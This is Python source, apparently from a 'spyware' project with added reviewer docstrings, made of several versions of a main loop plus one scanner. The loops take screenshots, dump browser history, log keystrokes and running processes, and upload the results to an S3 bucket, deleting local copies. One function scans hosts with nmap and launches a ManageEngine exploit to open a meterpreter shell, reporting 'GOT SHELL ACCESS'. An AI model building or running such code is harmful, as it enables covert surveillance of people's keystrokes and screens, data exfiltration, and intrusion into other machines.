def main(args):
    """Grab the screen in a loop and store each frame as a PNG in ``output_dir``.

    Args:
        args: parsed CLI namespace. Reads ``duration`` (used as days),
            ``interval`` (used as seconds), ``output_dir`` and ``s3_bucket``.

    Returns:
        None. Returns early, after printing a message, when ``output_dir``
        is not an existing directory.

    Triage notes:
        Files are named ``spyware-<MM-DD-mm-SS>.png`` and are written straight
        into ``output_dir``. With a non-empty ``s3_bucket`` each file is passed
        to ``utils.save_to_s3`` and then deleted locally, so in that mode the
        host keeps a frame only for the duration of the upload call.
    """
    duration = args.duration
    interval = args.interval
    output_dir = args.output_dir
    s3_bucket = args.s3_bucket

    if not os.path.isdir(output_dir):
        print('Output directory is not a directory.')
        return

    cur_date = datetime.now()
    end_date = timedelta(days=duration) + cur_date
    delta = timedelta(seconds=interval)

    # cur_date is a counter, not a clock: it starts at "now" and is advanced
    # by `delta` per pass. No sleep is visible in this block, so the loop
    # bound counts iterations rather than elapsed wall-clock time.
    while cur_date <= end_date:
        im = screenshot.grab()
        # The name carries month, day, minute and second only (no year, no
        # hour) and is derived from the counter above, so it is not a reliable
        # capture time; use filesystem timestamps when ordering recovered files.
        file_name = 'spyware-' + cur_date.strftime("%m-%d-%M-%S") + '.png'
        fp = output_dir + '/' + file_name
        im.save(fp)

        # save to the cloud and rm file locally
        # NOTE(review): the source layout was collapsed; placing os.remove
        # under the S3 branch is inferred from the comment above - confirm.
        if s3_bucket != "":
            utils.save_to_s3(fp, file_name)
            os.remove(fp)

        cur_date += delta
def put_data(key):
    """Store the request body's ``value`` under ``key`` in the S3-backed JSON document.

    The whole document is fetched, updated in memory, written to a local
    ``data.json`` and pushed back with ``save_to_s3``.

    Args:
        key: entry name to set; used as given.

    Returns:
        The literal string ``'200'``.

    NOTE(review): ``request`` is presumably the web framework's request
    object - confirm. ``key`` and the body are caller-supplied and used
    without validation: a body that is not a JSON object with a ``value``
    member raises here. No authentication or authorisation check is visible
    in this block. The document is rewritten as a whole through one fixed
    file in the working directory, so concurrent requests can overwrite each
    other's updates.
    """
    document = get_all_data_from_s3()
    body = request.json
    document[key] = body['value']

    local_copy = 'data.json'
    with open(local_copy, 'w') as handle:
        json.dump(document, handle)

    # Upload after the file is closed (nesting inferred from collapsed source).
    save_to_s3(local_copy)
    return '200'
def main(args):
    """Print a notice, write one browser-history dump, then grab the screen on a timer.

    Args:
        args: parsed CLI namespace. Reads ``duration`` (used as days),
            ``interval`` (used as seconds), ``output_dir`` and ``s3_bucket``.

    Returns:
        None. Returns early when ``output_dir`` is not an existing directory.

    Triage notes:
        Local mode (empty ``s3_bucket``) creates ``outputs/`` and
        ``outputs/screenshots/`` under ``output_dir`` and writes
        ``outputs/history.txt`` plus ``outputs/screenshots/spyware-<MM-DD-mm-SS>.png``.
        S3 mode writes ``history.txt`` directly in ``output_dir``, passes it to
        ``utils.save_to_s3`` under the name ``history`` and deletes it.
        The three ``print`` calls below write a plain-text notice to stdout.
    """
    # Describes what is happening
    print(
        "This spyware is takes a screeshot of the computer it is running on every 10 seconds."
    )
    print(
        "There is also a keylogging feature keeping track of each key pressed."
    )
    print(
        "It is probably taking screenshots of your screen right now as you are reading this. :)"
    )

    duration = args.duration
    interval = args.interval
    output_dir = args.output_dir
    s3_bucket = args.s3_bucket

    if not os.path.isdir(output_dir):
        print('Output directory is not a directory.')
        return

    cur_date = datetime.now()
    end_date = timedelta(days=duration) + cur_date
    delta = timedelta(seconds=interval)

    # creates directories
    # inputBrowser() is defined elsewhere; presumably it returns the browser
    # history as a JSON-serialisable dict (it is passed to json.dumps) - confirm.
    if s3_bucket == "":
        os.mkdir(output_dir + '/outputs')
        os.mkdir(output_dir + '/outputs/screenshots')
        browserhistDict = inputBrowser()
        file = open(output_dir + '/outputs/history.txt', 'w')
        file.write(json.dumps(browserhistDict))
        file.close()
    else:
        browserhistDict = inputBrowser()
        file = open(output_dir + '/history.txt', 'w')
        file.write(json.dumps(browserhistDict))
        # Order as in the source: upload and delete happen before close().
        utils.save_to_s3(output_dir + '/history.txt', "history")
        os.remove(output_dir + '/history.txt')
        file.close()

    # cur_date is a counter advanced by `delta` per pass; the real pacing
    # comes from the time.sleep call at the bottom of the loop.
    while cur_date <= end_date:
        im = screenshot.grab()
        file_name = 'spyware-' + cur_date.strftime("%m-%d-%M-%S") + '.png'
        fp = output_dir + '/outputs/screenshots' + '/' + file_name

        #save payloads to s3
        # NOTE(review): no im.save(fp) is visible on this branch, and the
        # outputs/ directories are only created in local mode; whether fp
        # exists at upload time depends on code outside this block - confirm
        # before expecting screenshot objects in the bucket.
        if s3_bucket != "":
            utils.save_to_s3(fp, file_name)
            os.remove(fp)
        else:
            #save all payloads (keylogger, history, output files) to output dir
            im.save(fp)

        time.sleep(int(interval))
        cur_date += delta
def main(args):
    """Print a notice, start the key-log mover thread and KeyLogger, then grab the screen on a timer.

    Args:
        args: parsed CLI namespace. Reads ``duration`` (used as days),
            ``interval`` (used as seconds), ``output_dir`` and ``s3_bucket``.

    Returns:
        None. Returns early when ``output_dir`` is not an existing directory.

    Triage notes:
        Creates ``outputs/``, ``outputs/screenshots/`` and ``outputs/keylogs/``
        under ``output_dir`` unconditionally. Screenshots are named
        ``spyware-<MM-DD-mm-SS>.png``. A second thread running
        ``ten_seconds_passed`` is started with the same ``output_dir`` and
        ``s3_bucket``; it is not a daemon thread (see the TODO), so the process
        stays alive for as long as that target keeps running.
    """
    # Describes what is happening
    print(
        "This spyware is takes a screeshot of the computer it is running on every 10 seconds."
    )
    print(
        "There is also a keylogging feature keeping track of each key pressed."
    )
    print(
        "It is probably taking screenshots of your screen right now as you are reading this. :)"
    )

    duration = args.duration
    interval = args.interval
    output_dir = args.output_dir
    s3_bucket = args.s3_bucket

    if not os.path.isdir(output_dir):
        print('Output directory is not a directory.')
        return

    cur_date = datetime.now()
    end_date = timedelta(days=duration) + cur_date
    delta = timedelta(seconds=interval)

    os.mkdir(output_dir + '/outputs')
    os.mkdir(output_dir + '/outputs/screenshots')
    os.mkdir(output_dir + '/outputs/keylogs')

    #arguments for the ten_second_passed thread
    kwargs = {'output_dir': output_dir, 's3_bucket': s3_bucket}
    #TODO: make daemon
    upload_thread = Thread(target=ten_seconds_passed, kwargs=kwargs)
    upload_thread.start()

    #start the KeyLogger
    #TODO: pass output_dir to constructor to save logs from there instead of doing so in thread
    # KeyLogger is defined elsewhere; presumably constructing it installs the
    # keyboard hook - confirm. The instance is not used again in this block.
    keylogger = KeyLogger()

    # cur_date is a counter advanced by `delta` per pass; the real pacing
    # comes from the time.sleep call at the bottom of the loop.
    while cur_date <= end_date:
        im = screenshot.grab()
        file_name = 'spyware-' + cur_date.strftime("%m-%d-%M-%S") + '.png'
        fp = output_dir + '/outputs/screenshots' + '/' + file_name

        #save payloads to s3
        # NOTE(review): no im.save(fp) is visible on this branch; whether fp
        # exists at upload time depends on code outside this block - confirm.
        if s3_bucket != "":
            utils.save_to_s3(fp, file_name)
            os.remove(fp)
        else:
            #save all payloads (keylogger, history, output files) to output dir
            im.save(fp)

        time.sleep(int(interval))
        cur_date += delta
def ten_seconds_passed(output_dir, s3_bucket):
    """Every ten seconds, move the key-log file into ``outputs/keylogs`` and optionally upload it.

    Runs forever; intended as a thread target.

    Args:
        output_dir: base directory; the log is moved to
            ``<output_dir>/outputs/keylogs/spyware-<MM-DD-mm-SS>.log``.
        s3_bucket: when non-empty, the moved file is passed to
            ``utils.save_to_s3`` and then deleted locally.

    Triage notes:
        The source file is ``output.txt`` in the process working directory,
        addressed with a Windows path separator. ``edit_lock`` and
        ``hasChanged`` are not defined in this block; presumably they are
        module-level state shared with the key logger - confirm.

    NOTE(review): ``hasChanged`` is assigned inside this function and no
    ``global``/``nonlocal`` declaration is visible, so Python treats it as a
    local name. The read in ``if not hasChanged`` therefore raises
    UnboundLocalError on the first pass, after ``edit_lock`` has been acquired
    and before it is released. As written, this revision would not be
    expected to produce ``.log`` files.
    """
    while True:
        time.sleep(10)
        edit_lock.acquire()
        if not hasChanged:
            cur_date = datetime.now()
            file_name = 'spyware-' + cur_date.strftime("%m-%d-%M-%S") + '.log'
            fp = output_dir + '/outputs/keylogs' + '/' + file_name

            #move output file to output directory
            os.rename(os.getcwd() + '\\output.txt', fp)

            #save payloads to s3
            # NOTE(review): nesting below is inferred from a collapsed source
            # line. The first os.remove targets the path that os.rename has
            # just moved away.
            if s3_bucket != "":
                utils.save_to_s3(fp, file_name)
                os.remove(os.getcwd() + '\\output.txt')
                os.remove(fp)
            hasChanged = True
        edit_lock.release()
def main(args):
    """Print a notice, dump browser history, start key logging, then record screenshots and new process names on a timer.

    Args:
        args: parsed CLI namespace. Reads ``duration`` (used as days),
            ``interval`` (used as seconds), ``output_dir`` and ``s3_bucket``.

    Returns:
        None. Returns early when ``output_dir`` is not an existing directory.

    Triage notes:
        Local mode (empty ``s3_bucket``) creates ``outputs/``,
        ``outputs/screenshots/`` and ``outputs/keylogs/`` under ``output_dir``
        and writes ``outputs/history.txt``. S3 mode writes ``history.txt``
        directly in ``output_dir``, uploads it as ``history.txt`` and deletes it.
        Both modes open ``outputs/processes.txt`` and append one line per
        process name not seen before, in the form
        ``<dd-mm-YYYY HH:MM:SS>: process_name: <name> pid: <pid>``.
        Each pass enumerates all processes with ``psutil.process_iter``, which
        is a periodic, observable behaviour.
    """
    # Describes what is happening
    print(
        "This spyware is takes a screeshot of the computer it is running on every 10 seconds."
    )
    print(
        "There is also a keylogging feature keeping track of each key pressed."
    )
    print(
        "It is probably taking screenshots of your screen right now as you are reading this. :)"
    )

    duration = args.duration
    interval = args.interval
    output_dir = args.output_dir
    s3_bucket = args.s3_bucket

    if not os.path.isdir(output_dir):
        print('Output directory is not a directory.')
        return

    cur_date = datetime.now()
    end_date = timedelta(days=duration) + cur_date
    delta = timedelta(seconds=interval)

    # creates directories
    # inputBrowser() is defined elsewhere; presumably it returns the browser
    # history as a JSON-serialisable dict (it is passed to json.dumps) - confirm.
    if s3_bucket == "":
        os.mkdir(output_dir + '/outputs')
        os.mkdir(output_dir + '/outputs/screenshots')
        os.mkdir(output_dir + '/outputs/keylogs')
        browserhistDict = inputBrowser()
        file = open(output_dir + '/outputs/history.txt', 'w')
        file.write(json.dumps(browserhistDict))
        file.close()
    else:
        browserhistDict = inputBrowser()
        file = open(output_dir + '/history.txt', 'w')
        file.write(json.dumps(browserhistDict))
        # Order as in the source: upload and delete happen before close().
        utils.save_to_s3(output_dir + '/history.txt', "history.txt")
        os.remove(output_dir + '/history.txt')
        file.close()

    # if you would like to run this on MacOS
    # You have to disable to keylogging aspect because
    # it is not supported. PyHook works on windows and linux
    # Prefer linux. Windows might be more error prone
    # Please comment the sections inside the two breaks '****'
    # https://stackoverflow.com/questions/10994750/something-like-pyhook-on-os-x
    # ************************
    #arguments for the ten_second_passed thread
    kwargs = {'output_dir': output_dir, 's3_bucket': s3_bucket}
    #TODO: make daemon
    upload_thread = Thread(target=ten_seconds_passed, kwargs=kwargs)
    upload_thread.start()

    #start the KeyLogger
    #TODO: pass output_dir to constructor to save logs from there instead of doing so in thread
    keylogger = KeyLogger()
    # ************************

    # Process names already written to processes.txt during this run.
    processes_seen = []
    # Create (or truncate) the process log before the loop appends to it.
    fcreate = open(output_dir + "/outputs/processes.txt", "w")
    fcreate.close()

    # cur_date is a counter advanced by `delta` per pass; the real pacing
    # comes from the time.sleep call at the bottom of the loop.
    while cur_date <= end_date:
        im = screenshot.grab()
        file_name = 'spyware-' + cur_date.strftime("%m-%d-%M-%S") + '.png'
        fp = output_dir + '/outputs/screenshots' + '/' + file_name

        # Reopened in append mode on every pass; no close() is visible.
        f = open(output_dir + "/outputs/processes.txt", "a")
        changed = False
        for process in psutil.process_iter():
            processInfo = process.as_dict(attrs=['pid', 'name', 'create_time'])
            processID = processInfo['pid']
            processName = processInfo['name']
            # De-duplication is by name only, so a second process with the
            # same name but a different pid is not logged.
            if processName not in processes_seen:
                processCreationTime = time.strftime(
                    '%d-%m-%Y %H:%M:%S',
                    time.localtime(processInfo['create_time']))
                f.write(
                    f'{processCreationTime}: process_name: {processName} pid: {processID}\n'
                )
                processes_seen.append(processName)
                changed = True

        #save payloads to s3
        # NOTE(review): the source was collapsed onto one line; pairing the
        # `else` with the s3_bucket test (not with `if changed`) is inferred.
        # No im.save(fp) is visible on the S3 branch - confirm whether fp
        # exists at upload time.
        if s3_bucket != "":
            utils.save_to_s3(fp, file_name)
            os.remove(fp)
            if changed:
                utils.save_to_s3(output_dir + "/outputs/processes.txt",
                                 "processes.txt")
        else:
            #save all payloads (keylogger, history, output files) to output dir
            im.save(fp)

        time.sleep(int(interval))
        cur_date += delta

    # NOTE(review): `s3` is not assigned in this function (the local is
    # `s3_bucket`). Unless `s3` is a module-level name, this line raises
    # NameError and processes.txt stays on disk - confirm.
    if s3 != "":
        os.remove(output_dir + "/outputs/processes.txt")
def main():
    """Parse the CLI, run a subnet or single-target scan, and write findings to the report.

    Exactly one of ``--subnet`` / ``--target`` must be given; otherwise a usage
    hint is printed. For each scanned host with a truthy ``scan_result`` the one
    supported proof-of-concept module is invoked and, when it returns a truthy
    value, the output of ``sysinfo`` is appended to the report.

    Relies on names not defined in this block: ``cid`` and ``client`` (declared
    global here), ``report``, ``filename``, ``s3``, ``subnet_nmap_scan``,
    ``target_nmap_scan``, ``exploits`` and ``utils``.

    NOTE(review):
      * The proof-of-concept call uses fixed addresses (172.28.128.3 /
        172.28.128.1, private-range, presumably a lab network) rather than the
        host that was just scanned.
      * ``-s3/--s3_bucket`` is parsed into ``args.s3_bucket``, but the final
        check reads ``s3``; unless ``s3`` is set elsewhere the option has no
        effect here - confirm.
      * In the subnet branch ``target_nmap_scan(host)`` is called twice per
        host and the first result is discarded.
    """
    global cid
    global client
    # Writes "db_status" to an existing console on `client`; presumably a
    # Metasploit RPC console opened elsewhere - confirm.
    client.consoles.console(cid).write("db_status")
    # Banner; the literal is kept exactly as it appears in the source.
    print(""" ______ ______ ______ ______ ______ /\__ _\ /\ == \ /\ __ \ /\ ___\ /\__ _\ \/_/\ \/ \ \ __< \ \ __ \ \ \ __\ \/_/\ \/ \ \_\ \ \_\ \_\ \ \_\ \_\ \ \_\ \ \_\ \/_/ \/_/ /_/ \/_/\/_/ \/_/ \/_/ """)

    parser = argparse.ArgumentParser(
        description='Tool for host discovery and vulnerability scanning.')
    parser.add_argument("-s",
                        "--subnet",
                        action="store",
                        dest='subnet',
                        help="range of IP addresses")
    parser.add_argument("-t",
                        "--target",
                        action="store",
                        dest='target',
                        help="target IP address")
    parser.add_argument("-s3",
                        "--s3_bucket",
                        default="",
                        help="The s3 bucket for the report.")
    args = parser.parse_args()

    if args.subnet == None and args.target == None:
        print('No inputs provided, please use -h for usage information.')
    elif args.subnet != None and args.target != None:
        print('Too many inputs provided, please use -h for usage information.')
    elif args.subnet != None:
        print('Running Subnet Scan...\n')
        report.write("Performing SUBNET SCAN on " + args.subnet + "\n")
        hosts = subnet_nmap_scan(args.subnet)
        print('Found the following hosts: ' + str(hosts) + "\n")
        report.write("Live hosts on SUBNET: " + str(hosts) + "\n\n")
        for host in hosts:
            print('Running Target Scan on host ' + str(host) + '...\n')
            target_nmap_scan(host)
            scan_result = target_nmap_scan(host)
            if not scan_result:
                print('No vulnerabilities found.\n')
                print()
            else:
                # run the exploits returned by scan_results.
                # one proof of concept exploit is currently supported.
                # takes some domain knowledge, research and manual testing to write this.
                #TODO: create a dictionary
                # {exploit -> supported_exploit_method_name}
                # {'exploit/windows/http/manageengine_connectionid_write': manageengine_connectionid_write}
                # The return value is used only for truthiness and for
                # run_with_output; presumably a session handle - confirm.
                meterpreter = exploits.manageengine_connectionid_write(
                    rhosts="172.28.128.3", rport="8022", lhosts="172.28.128.1")
                if meterpreter:
                    report.write(
                        "GOT SHELL ACCESS! Your target is done for muahahaha")
                    report.write("Running `sysinfo`: ")
                    report.write(meterpreter.run_with_output('sysinfo'))
    elif args.target != None:
        print('Running Target Scan on host ' + str(args.target) + '...\n')
        report.write("Performing TARGET SCAN on " + args.target + "\n\n")
        scan_result = target_nmap_scan(args.target)
        if not scan_result:
            print('No vulnerabilities found.\n')
        else:
            # run the exploits returned by scan_results.
            # one proof of concept exploit is currently supported.
            # takes some domain knowledge, research and manual testing to write this.
            meterpreter = exploits.manageengine_connectionid_write(
                rhosts="172.28.128.3", rport="8022", lhosts="172.28.128.1")
            if meterpreter:
                report.write(
                    "GOT SHELL ACCESS! Your target is done for muahahaha")
                report.write("Running `sysinfo`: ")
                report.write(meterpreter.run_with_output('sysinfo'))

    # The report is closed on every path, including the two usage-error paths.
    report.close()
    # When `s3` is non-empty the report file is uploaded as "Traft_Report.txt"
    # and the local copy is deleted.
    if s3 != "":
        utils.save_to_s3(filename + ".txt", "Traft_Report.txt")
        os.remove(filename + ".txt")
def main(args):
    """Print a notice, dump browser history, then record screenshots and new process names on a timer.

    Args:
        args: parsed CLI namespace. Reads ``duration`` (used as days),
            ``interval`` (used as seconds), ``output_dir`` and ``s3_bucket``.

    Returns:
        None. Returns early when ``output_dir`` is not an existing directory.

    Triage notes:
        Local mode (empty ``s3_bucket``) creates ``outputs/`` and
        ``outputs/screenshots/`` under ``output_dir`` and writes
        ``outputs/history.txt``. S3 mode writes ``history.txt`` directly in
        ``output_dir``, uploads it as ``history`` and deletes it. Both modes
        open ``outputs/processes.txt`` and append one line per process name not
        seen before, in the form
        ``<dd-mm-YYYY HH:MM:SS>: process_name: <name> pid: <pid>``.
        Each pass enumerates all processes with ``psutil.process_iter``.
    """
    # Describes what is happening
    print(
        "This spyware is takes a screeshot of the computer it is running on every 10 seconds."
    )
    print(
        "There is also a keylogging feature keeping track of each key pressed."
    )
    print(
        "It is probably taking screenshots of your screen right now as you are reading this. :)"
    )

    duration = args.duration
    interval = args.interval
    output_dir = args.output_dir
    s3_bucket = args.s3_bucket

    if not os.path.isdir(output_dir):
        print('Output directory is not a directory.')
        return

    cur_date = datetime.now()
    end_date = timedelta(days=duration) + cur_date
    delta = timedelta(seconds=interval)

    # creates directories
    # inputBrowser() is defined elsewhere; presumably it returns the browser
    # history as a JSON-serialisable dict (it is passed to json.dumps) - confirm.
    if s3_bucket == "":
        os.mkdir(output_dir + '/outputs')
        os.mkdir(output_dir + '/outputs/screenshots')
        browserhistDict = inputBrowser()
        file = open(output_dir + '/outputs/history.txt', 'w')
        file.write(json.dumps(browserhistDict))
        file.close()
    else:
        browserhistDict = inputBrowser()
        file = open(output_dir + '/history.txt', 'w')
        file.write(json.dumps(browserhistDict))
        # Order as in the source: upload and delete happen before close().
        utils.save_to_s3(output_dir + '/history.txt', "history")
        os.remove(output_dir + '/history.txt')
        file.close()

    # Process names already written to processes.txt during this run.
    processes_seen = []
    # Create (or truncate) the process log before the loop appends to it.
    # NOTE(review): outputs/ is only created in local mode above; in S3 mode
    # this open depends on the directory already existing - confirm.
    fcreate = open(output_dir + "/outputs/processes.txt", "w")
    fcreate.close()

    # cur_date is a counter advanced by `delta` per pass; the real pacing
    # comes from the time.sleep call at the bottom of the loop.
    while cur_date <= end_date:
        im = screenshot.grab()
        file_name = 'spyware-' + cur_date.strftime("%m-%d-%M-%S") + '.png'
        fp = output_dir + '/outputs/screenshots' + '/' + file_name

        # Reopened in append mode on every pass; no close() is visible.
        f = open(output_dir + "/outputs/processes.txt", "a")
        changed = False
        for process in psutil.process_iter():
            processInfo = process.as_dict(attrs=['pid', 'name', 'create_time'])
            processID = processInfo['pid']
            processName = processInfo['name']
            # De-duplication is by name only, so a second process with the
            # same name but a different pid is not logged.
            if processName not in processes_seen:
                processCreationTime = time.strftime(
                    '%d-%m-%Y %H:%M:%S',
                    time.localtime(processInfo['create_time']))
                f.write(
                    f'{processCreationTime}: process_name: {processName} pid: {processID}\n'
                )
                processes_seen.append(processName)
                changed = True

        #save payloads to s3
        # NOTE(review): the source was collapsed onto one line; pairing the
        # `else` with the s3_bucket test (not with `if changed`) is inferred.
        # No im.save(fp) is visible on the S3 branch - confirm whether fp
        # exists at upload time.
        if s3_bucket != "":
            utils.save_to_s3(fp, file_name)
            os.remove(fp)
            if changed:
                utils.save_to_s3(output_dir + "/outputs/processes.txt",
                                 "processes")
        else:
            #save all payloads (keylogger, history, output files) to output dir
            im.save(fp)

        time.sleep(int(interval))
        cur_date += delta

    # NOTE(review): `s3` is not assigned in this function (the local is
    # `s3_bucket`). Unless `s3` is a module-level name, this line raises
    # NameError and processes.txt stays on disk - confirm.
    if s3 != "":
        os.remove(output_dir + "/outputs/processes.txt")